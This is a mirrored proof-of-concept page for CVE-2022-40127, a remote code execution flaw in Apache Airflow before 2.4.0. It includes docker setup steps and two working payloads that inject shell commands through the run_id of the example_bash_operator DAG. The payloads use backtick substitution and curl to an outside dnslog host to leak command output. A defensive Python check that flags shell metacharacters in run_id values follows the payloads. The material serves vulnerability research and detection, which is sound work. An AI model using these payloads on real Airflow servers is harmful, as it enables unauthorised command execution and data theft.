POC details: 9d788aa651e4c1fe35a51b6fe04ec31c6b4a3763

Source
Related vulnerability
Title: Apache Airflow code injection vulnerability (CVE-2022-40127)
Description: Apache Airflow is an open-source platform from the Apache Software Foundation (USA) for creating, managing and monitoring workflows; it is extensible and supports dynamic monitoring. Apache Airflow contains a code injection vulnerability: its example DAGs allow an attacker with UI access to trigger DAGs and execute arbitrary commands by manually supplying the run_id parameter.
Description
Apache Airflow < 2.4.0 DAG example_bash_operator RCE POC
Introduction
# CVE-2022-40127
Apache Airflow < 2.4.0 DAG example_bash_operator RCE

# poc docker env:

```
mkdir CVE-2022-40127 && cd CVE-2022-40127
curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.3.4/docker-compose.yaml'
# or: wget https://github.com/Mr-xn/CVE-2022-40127/raw/main/docker-compose.yaml
mkdir -p ./dags ./logs ./plugins
echo -e "AIRFLOW_UID=$(id -u)" > .env
docker-compose up airflow-init
docker-compose up -d
# wait a while for the services to come up
open localhost:8080
```

# POC 1

example_bash_operator

```
{"fxoxx":"\";curl `uname`.lxx2.535ld4zn.dnslog.pw;\""}
```

<img width="952" alt="image" src="https://user-images.githubusercontent.com/18260135/202715494-4ca2fd4f-384e-40aa-ae7b-02ca51defa4f.png">

## dnslog via

<img width="414" alt="image" src="https://user-images.githubusercontent.com/18260135/202846433-4a4a40fa-675e-477b-a9c4-be2f6c894583.png">


# POC 2

```
curl -X 'POST' \
  'http://10.11.12.131:8080/api/v1/dags/example_bash_operator/dagRuns' \
  -H 'accept: application/json' \
  -H 'Content-Type: application/json' \
  -d '{
    "conf": {
      "dag_run": "api2"
    },
    "dag_run_id": "id \"&& curl `whoami`.api222.535ld4zn.dnslog.pw",
    "logical_date": "2022-11-19T10:13:13.920Z"
  }'
```

http://localhost:8080/redoc#tag/DAGRun/operation/post_dag_run
<img width="1638" alt="image" src="https://user-images.githubusercontent.com/18260135/202846307-165943c3-dd8e-4d92-aae8-72516fc00f82.png">

http://localhost:8080/api/v1/ui/#/DAGRun/post_dag_run
<img width="1454" alt="image" src="https://user-images.githubusercontent.com/18260135/202846350-ca6d0770-8143-4da8-8ac5-1596f365cff9.png">

<img width="1453" alt="image" src="https://user-images.githubusercontent.com/18260135/202846365-e4d0b467-7e06-4112-899b-14245dc17b5f.png">

## dnslog via

<img width="408" alt="image" src="https://user-images.githubusercontent.com/18260135/202846417-9d359d5a-cc6f-4be2-8003-cfefd3d488f4.png">


commit:

https://github.com/apache/airflow/pull/25960/files#diff-7c35dc3aa6659f910139c28057dfc663dd886dd0dfb3d8a971603c2ae7790d2a

links:

https://stackoverflow.com/questions/67110383/how-to-trigger-airflow-dag-with-rest-api-i-get-property-is-read-only-state
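As an added defender-side example (not part of the original POC and not Airflow's own code): an audit routine that flags run_id values containing shell metacharacters, as both POCs above rely on a run_id reaching a templated bash command; the allow-list pattern, the function names and the sample run_id values are assumptions constructed for this example (the DNS hostnames are placeholders).

```python
import re
from typing import Iterable, List, Tuple

# Assumed conservative allow-list for run_id values: letters, digits and a few
# separators. Anything outside it is reported for review.
SAFE_RUN_ID = re.compile(r"^[A-Za-z0-9_.~:+-]+$")

# Shell constructs that must never appear in a value that is templated into a bash_command.
SHELL_PATTERNS = {
    "command_substitution": re.compile(r"`[^`]*`|\$\("),
    "command_chaining": re.compile(r"&&|\|\||;"),
    "quote_breakout": re.compile(r"[\"']"),
    "redirection_or_pipe": re.compile(r"[<>|]"),
}


def is_safe_run_id(run_id: str) -> bool:
    """True when run_id consists only of allow-listed characters."""
    return bool(SAFE_RUN_ID.match(run_id))


def classify_run_id(run_id: str) -> List[str]:
    """Names of the shell patterns found in run_id (empty list if none)."""
    return [name for name, pat in SHELL_PATTERNS.items() if pat.search(run_id)]


def audit_run_ids(run_ids: Iterable[str]) -> List[Tuple[str, List[str]]]:
    """Return (run_id, findings) for every run_id failing the allow-list.

    findings may be empty when the value only contains an unexpected character
    (for example a space) without any recognised shell construct."""
    return [(rid, classify_run_id(rid)) for rid in run_ids if not is_safe_run_id(rid)]


# Constructed sample resembling the run_id column of Airflow's dag_run table,
# including the two run_id shapes used by the POCs above (hostnames replaced).
SAMPLE_RUN_IDS = [
    "scheduled__2022-11-19T00:00:00+00:00",
    "manual__2022-11-19T10:13:13.920000+00:00",
    'id "&& curl `whoami`.example.invalid',
    '";curl `uname`.example.invalid;"',
]

if __name__ == "__main__":
    for rid, findings in audit_run_ids(SAMPLE_RUN_IDS):
        print(f"suspicious run_id {rid!r}: {findings}")
```

The same check can be applied at an API gateway in front of `POST /api/v1/dags/{dag_id}/dagRuns`, rejecting requests whose `dag_run_id` fails `is_safe_run_id`.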
File snapshot

```
[4.0K] /data/pocs/9d788aa651e4c1fe35a51b6fe04ec31c6b4a3763
├── [10.0K] docker-compose.yaml
└── [2.1K] README.md

0 directories, 2 files
```
Cached for you by the Shenlong bot
Notes
    1. It is recommended to access the POC through the source link first.
    2. If the source has expired or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.